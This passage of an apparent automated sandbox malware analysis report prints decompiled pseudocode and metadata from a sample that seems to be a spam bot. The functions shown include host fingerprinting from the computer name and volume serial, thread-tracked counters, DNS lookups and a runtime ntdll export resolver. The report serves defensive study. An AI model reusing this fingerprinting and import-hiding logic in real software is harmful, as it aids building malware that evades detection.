                                                                                				if(_t15 < 0xea60) {
                                                                                					goto L17;
                                                                                				}
                                                                                				_t41 =  *0x413380;
                                                                                				_t17 =  *_t41;
                                                                                				_t45 =  *(_t41 + 1);
                                                                                				_t42 = _t41 + 5;
                                                                                				_v12 = _t17;
                                                                                				if(_t17 <= 0) {
                                                                                					L16:
                                                                                					_t15 = GetTickCount();
                                                                                					 *0x413388 = _t15;
                                                                                					goto L17;
                                                                                				} else {
                                                                                					_v8 = _t42;
                                                                                					do {
                                                                                						_t35 =  *_v8;
                                                                                						if(_t35 != 8) {
                                                                                							if(_t35 != 9) {
                                                                                								_t36 = _t35;
                                                                                								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
                                                                                								if(_t19 == 0) {
                                                                                									goto L12;
                                                                                								}
                                                                                								_t9 = _t19 + 0x34; // 0x3b10c483
                                                                                								if(_t36 ==  *_t9) {
                                                                                									_t13 = _t19 + 0x50; // 0x7486850
                                                                                									_t20 =  *_t13;
                                                                                									if(_t20 != 0) {
                                                                                										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
                                                                                									}
                                                                                									goto L16;
                                                                                								}
                                                                                								goto L12;
                                                                                							}
                                                                                							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
                                                                                							L8:
                                                                                							if(_t25 != 0) {
                                                                                								_t6 = _v8 + 1; // 0x3cc6
                                                                                								_t45 = _t45 |  *_t6;
                                                                                							}
                                                                                							goto L12;
                                                                                						}
                                                                                						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
                                                                                						goto L8;
                                                                                						L12:
                                                                                						_v8 = _v8 + 5;
                                                                                						_t31 = _t31 + 1;
                                                                                					} while (_t31 < _v12);
                                                                                					goto L16;
                                                                                				}
                                                                                			}

                                                                                0x00408cf2
                                                                                0x00408cf4
                                                                                0x00408cfc
                                                                                0x00408dae
                                                                                0x00408db0
                                                                                0x00408db0
                                                                                0x00408d08
                                                                                0x00408d13
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408d1b
                                                                                0x00408d21
                                                                                0x00408d24
                                                                                0x00408d27
                                                                                0x00408d2a
                                                                                0x00408d2f
                                                                                0x00408da1
                                                                                0x00408da1
                                                                                0x00408da8
                                                                                0x00000000
                                                                                0x00408d31
                                                                                0x00408d31
                                                                                0x00408d34
                                                                                0x00408d37
                                                                                0x00408d3c
                                                                                0x00408d50
                                                                                0x00408d6c
                                                                                0x00408d6f
                                                                                0x00408d78
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408d7a
                                                                                0x00408d7d
                                                                                0x00408d8b
                                                                                0x00408d8b
                                                                                0x00408d90
                                                                                0x00408d9e
                                                                                0x00408da0
                                                                                0x00000000
                                                                                0x00408d90
                                                                                0x00000000
                                                                                0x00408d7d
                                                                                0x00408d5a
                                                                                0x00408d5f
                                                                                0x00408d62
                                                                                0x00408d67
                                                                                0x00408d67
                                                                                0x00408d67
                                                                                0x00000000
                                                                                0x00408d62
                                                                                0x00408d46
                                                                                0x00000000
                                                                                0x00408d7f
                                                                                0x00408d7f
                                                                                0x00408d83
                                                                                0x00408d84
                                                                                0x00000000
                                                                                0x00408d89

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: localcfg
                                                                                • API String ID: 536389180-1857712256
                                                                                • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTickwsprintf
                                                                                • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                • API String ID: 2424974917-1012700906
                                                                                • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				/* _a4: array of _a8 pointers; each element points to a pointer to a record
				   whose fields sit at negative offsets from that address. Decompiler output;
				   the declarations of _t10 and _t34 were missing and have been added. */
				signed int _v8;
				signed int _t29;
				intOrPtr* _t10;
				intOrPtr _t34;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29;   /* nothing to do; the value returned is whatever eax held */
				}
				_t29 = E004030FA(0x412c00);   /* subcall spins on InterlockedExchange/GetTickCount: takes the lock at 0x412c00 */
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x412c00 =  *0x412c00 & 0x00000000;   /* release the lock */
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
						_t45 =  *((intOrPtr*)(_t50 - 0x24));   /* linked parent record */
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							/* record last touched by another thread: decrement the counter at -0x1c,
							   clamp it at zero and record the current thread as owner */
							_t10 = (intOrPtr*)(_t50 - 0x1c);
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						/* bump the use counter at -0xc; once it reaches the limit at -8 the record is
						   marked with state 2, and the parent's counter (+0x10) is advanced; when the
						   parent reaches its own limit (+0x14) it is marked too and E00406509 runs once,
						   guarded by the flag at 0x412bfc */
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
								 *((intOrPtr*)(_t45 + 8)) = _t43;
								if( *0x412bfc == 0) {
									E00406509(_t34);
									 *0x412bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}

                                                                                APIs
                                                                                  • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                  • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 3716169038-2903620461
                                                                                • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 020870BC
                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 020870F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountLookupUser
                                                                                • String ID: |
                                                                                • API String ID: 2370142434-2343686810
                                                                                • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction ID: aeaecfcc7673227d1802c771807a239085fca7687d45ce6d91001a718f86b38a
                                                                                • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction Fuzzy Hash: DB112E76900218EBDF51DBD8DC84AEFB7BCAB04305F2441A6E551E6068D7709784DBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 60%
			E00401B71() {
				/* Builds a 31-bit host identifier from the computer name, the volume serial
				   number of the current drive and a value returned by E00401AC3 (the subcall
				   that resolves Iphlpapi!GetAdaptersAddresses). _v28 is the first byte of a
				   16-byte name buffer; the stos sequence zeroes the remaining 15 bytes. */
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;                                   /* buffer size for GetComputerNameA (MAX_COMPUTERNAME_LENGTH) */
				_t12 = E00401AC3();                           /* adapter-derived value */
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);   /* _v8 receives the volume serial number */
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0040ECA5() & 0x7fffffff;          /* fallback when the XOR collapses to zero */
				}
				return _t28;
			}

                                                                                APIs
                                                                                  • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                  • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401BA3
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: localcfg
                                                                                • API String ID: 2777991786-1857712256
                                                                                • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				/* _a4: array of _a8 record pointers. For every slot whose state byte (+0x10) is 1
				   and whose name field (+0x12) is empty: store _a20 at +0x11, copy at most 0x3e
				   bytes of _a16 into the name field, set the state byte to _a12 and bump one of
				   two global counters (0x41363c when the new state is 2, 0x413640 otherwise). */
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;        /* force termination of the name field */
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_t17 = InterlockedIncrement(0x413640);
							} else {
								_t17 = InterlockedIncrement(0x41363c);
							}
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);   /* no break: the loop keeps scanning after a match */
					return _t17;
				}
				return _t15;   /* decompiler artifact: _t15 is never assigned on this path */
			}

                                                                                APIs
                                                                                • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
                                                                                • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: IncrementInterlockedlstrcpyn
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 224340156-2903620461
                                                                                • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbyaddrinet_ntoa
                                                                                • String ID: localcfg
                                                                                • API String ID: 2112563974-1857712256
                                                                                • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID: time_cfg
                                                                                • API String ID: 1594361348-2401304539
                                                                                • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			/* Lazy export resolver for ntdll.dll: the module handle is cached in the
                                                                                 			   global at 0x4136f4 on first use, after which GetProcAddress is called
                                                                                 			   with the caller-supplied export name (_a4). Returns NULL when the
                                                                                 			   LoadLibraryA call fails. Resolving ntdll exports by name at run time
                                                                                 			   keeps them out of the import table. */
                                                                                 			E0040EAE4(CHAR* _a4) {
                                                                                 				struct HINSTANCE__* _t2;
                                                                                 
                                                                                 				_t2 =  *0x4136f4;                          /* cached ntdll.dll handle */
                                                                                 				if(_t2 != 0) {
                                                                                 					L3:
                                                                                 					return GetProcAddress(_t2, _a4);       /* _a4: export name */
                                                                                 				} else {
                                                                                 					_t2 = LoadLibraryA("ntdll.dll");
                                                                                 					 *0x4136f4 = _t2;                      /* cache for later calls */
                                                                                 					if(_t2 != 0) {
                                                                                 						goto L3;
                                                                                 					} else {
                                                                                 						return _t2;                        /* load failed: NULL */
                                                                                 					}
                                                                                 				}
                                                                                 			}

                                                                                 Statement addresses (listing order): 0x0040eae4, 0x0040eaeb, 0x0040eb02, 0x0040eb0d, 0x0040eaed, 0x0040eaf2, 0x0040eaf8, 0x0040eaff, 0x00000000, 0x0040eb01, 0x0040eb01, 0x0040eb01, 0x0040eaff

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,76A1F210,80000001,00000000), ref: 0040EAF2
                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0040EB07
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 2574300362-2227199552
                                                                                • Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                • Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
                                                                                • Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                • Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			/* Collects the entries of a singly linked heap list returned by
                                                                                 			   E00402D21(_a4) (per entry: next pointer at +0, 16-bit key at +4,
                                                                                 			   NUL-terminated string at +8) into consecutive 0x100-byte string slots
                                                                                 			   at _a8, stores the entry count in *_a12, frees the list and then orders
                                                                                 			   the slots by ascending key. At most five entries are kept; the keys live
                                                                                 			   in a local WORD array at _t121 - 0x6c and string exchanges go through the
                                                                                 			   360-byte stack buffer _v368. Judging by its use here, E0040EE08(dst, src,
                                                                                 			   n) is a memcpy-style copy: every call is preceded by an inlined strlen
                                                                                 			   whose result + 1 (terminator included) is passed as the length.
                                                                                 			   E00402D21 itself calls GetModuleHandleA/LoadLibraryA (see the APIs list
                                                                                 			   below). Returns 1 on success, 0 when E00402D21 returned NULL. */
                                                                                 			E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                 				signed int _v8;
                                                                                 				void* _v12;
                                                                                 				char _v368;
                                                                                 				void* _t64;
                                                                                 				signed short* _t66;
                                                                                 				intOrPtr* _t67;
                                                                                 				intOrPtr* _t72;
                                                                                 				intOrPtr* _t76;
                                                                                 				intOrPtr* _t82;
                                                                                 				short _t86;
                                                                                 				intOrPtr* _t87;
                                                                                 				signed int _t94;
                                                                                 				intOrPtr _t96;
                                                                                 				signed int _t99;
                                                                                 				short* _t100;
                                                                                 				void* _t101;
                                                                                 				void* _t102;
                                                                                 				void* _t103;
                                                                                 				intOrPtr _t109;
                                                                                 				intOrPtr _t110;
                                                                                 				intOrPtr _t111;
                                                                                 				intOrPtr _t114;
                                                                                 				void* _t115;
                                                                                 				intOrPtr* _t116;
                                                                                 				void* _t117;
                                                                                 				signed int _t118;
                                                                                 				void* _t121;
                                                                                 				void* _t122;
                                                                                 				void* _t123;
                                                                                 				void* _t124;
                                                                                 
                                                                                 				_t116 = _a12;                                  /* out: entry count */
                                                                                 				_t94 = 0;                                      /* entries copied so far */
                                                                                 				 *_t116 = 0;
                                                                                 				_t117 = E00402D21(_a4);                        /* list head */
                                                                                 				if(_t117 != 0) {
                                                                                 					if( *_t117 != 0) {                         /* more than one entry */
                                                                                 						_v12 = _t117;                          /* keep head for HeapFree */
                                                                                 						_a12 = _a8;                            /* current 0x100-byte output slot */
                                                                                 						while(_t94 < 5) {                      /* cap: five entries */
                                                                                 							_t9 = _t117 + 8; // 0x8                /* entry string at +8 */
                                                                                 							_t104 = _t9;
                                                                                 							_t82 = _t9;
                                                                                 							_t10 = _t82 + 1; // 0x9
                                                                                 							_v8 = _t10;
                                                                                 							do {                                   /* inlined strlen */
                                                                                 								_t114 =  *_t82;
                                                                                 								_t82 = _t82 + 1;
                                                                                 							} while (_t114 != 0);
                                                                                 							E0040EE08(_a12, _t104, _t82 - _v8 + 1);    /* copy string incl. NUL into slot */
                                                                                 							_t86 =  *((intOrPtr*)(_t117 + 4));         /* entry key at +4 */
                                                                                 							_a12 = _a12 + 0x100;                       /* next slot */
                                                                                 							_t122 = _t122 + 0xc;
                                                                                 							 *_t116 =  *_t116 + 1;                     /* count++ */
                                                                                 							_t117 =  *_t117;                           /* next entry */
                                                                                 							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;  /* key[_t94] = entry key */
                                                                                 							_t94 = _t94 + 1;
                                                                                 							if(_t117 != 0) {
                                                                                 								continue;
                                                                                 							}
                                                                                 							break;
                                                                                 						}
                                                                                 						HeapFree(GetProcessHeap(), 0, _v12);           /* release the list */
                                                                                 						_v8 = _v8 & 0x00000000;                        /* sort index i = 0 */
                                                                                 						if( *_t116 == 1) {
                                                                                 							L24:
                                                                                 							return 1;
                                                                                 						}
                                                                                 						_t64 =  *_t116 - 1;
                                                                                 						_a12 = _a8;                                    /* slot i */
                                                                                 						do {                                           /* outer loop over slot i (_v8) */
                                                                                 							_t118 = _v8;                               /* index of the entry moved into slot i */
                                                                                 							_t99 = _t118;
                                                                                 							if(_t118 >=  *_t116 - 1) {
                                                                                 								L17:
                                                                                 								/* exchange key[i] and key[_t118]; as decompiled, the read of the
                                                                                 								   old key[i] has been folded into the two stores below */
                                                                                 								_t66 = _t121 + _v8 * 2 - 0x6c;
                                                                                 								_t100 = _t121 + _t118 * 2 - 0x6c;
                                                                                 								 *_t66 =  *_t100;
                                                                                 								_t67 = _a12;
                                                                                 								 *_t100 =  *_t66 & 0x0000ffff;
                                                                                 								_t101 = _t67 + 1;
                                                                                 								do {                                       /* strlen(slot i) */
                                                                                 									_t109 =  *_t67;
                                                                                 									_t67 = _t67 + 1;
                                                                                 								} while (_t109 != 0);
                                                                                 								E0040EE08( &_v368, _a12, _t67 - _t101 + 1);    /* tmp = slot i */
                                                                                 								_t123 = _t122 + 0xc;
                                                                                 								_t120 = (_t118 << 8) + _a8;                /* slot _t118 (index * 0x100) */
                                                                                 								_t72 = (_t118 << 8) + _a8;
                                                                                 								_t102 = _t72 + 1;
                                                                                 								do {                                       /* strlen(slot _t118) */
                                                                                 									_t110 =  *_t72;
                                                                                 									_t72 = _t72 + 1;
                                                                                 								} while (_t110 != 0);
                                                                                 								E0040EE08(_a12, _t120, _t72 - _t102 + 1);    /* slot i = slot _t118 */
                                                                                 								_t76 =  &_v368;
                                                                                 								_t124 = _t123 + 0xc;
                                                                                 								_t103 = _t76 + 1;
                                                                                 								do {                                       /* strlen(tmp) */
                                                                                 									_t111 =  *_t76;
                                                                                 									_t76 = _t76 + 1;
                                                                                 								} while (_t111 != 0);
                                                                                 								goto L23;
                                                                                 							} else {
                                                                                 								goto L14;
                                                                                 							}
                                                                                 							do {                                           /* scan the remaining keys for the entry to move into slot i */
                                                                                 								L14:
                                                                                 								/* compares key[_t99 + 1] with key[_t99], as decompiled */
                                                                                 								if( *((intOrPtr*)(_t121 + _t99 * 2 - 0x6a)) <  *((intOrPtr*)(_t121 + _t99 * 2 - 0x6c))) {
                                                                                 									_t32 = _t99 + 1; // 0x1
                                                                                 									_t118 = _t32;
                                                                                 								}
                                                                                 								_t99 = _t99 + 1;
                                                                                 							} while (_t99 < _t64);
                                                                                 							goto L17;
                                                                                 							L23:
                                                                                 							E0040EE08(_t120,  &_v368, _t76 - _t103 + 1);   /* slot _t118 = tmp */
                                                                                 							_a12 = _a12 + 0x100;                           /* next slot */
                                                                                 							_t122 = _t124 + 0xc;
                                                                                 							_v8 = _v8 + 1;                                 /* i++ */
                                                                                 							_t64 =  *_t116 - 1;
                                                                                 						} while (_v8 < _t64);
                                                                                 						goto L24;
                                                                                 					}
                                                                                 					/* single-entry list: copy its string into the first slot and free the node */
                                                                                 					_t3 = _t117 + 8; // 0x8
                                                                                 					_t105 = _t3;
                                                                                 					_t87 = _t3;
                                                                                 					_t4 = _t87 + 1; // 0x9
                                                                                 					_t115 = _t4;
                                                                                 					do {                                           /* inlined strlen */
                                                                                 						_t96 =  *_t87;
                                                                                 						_t87 = _t87 + 1;
                                                                                 					} while (_t96 != 0);
                                                                                 					E0040EE08(_a8, _t105, _t87 - _t115 + 1);
                                                                                 					 *_t116 =  *_t116 + 1;                         /* count = 1 */
                                                                                 					HeapFree(GetProcessHeap(), 0, _t117);
                                                                                 					goto L24;
                                                                                 				}
                                                                                 				return 0;                                      /* E00402D21 returned NULL */
                                                                                 			}

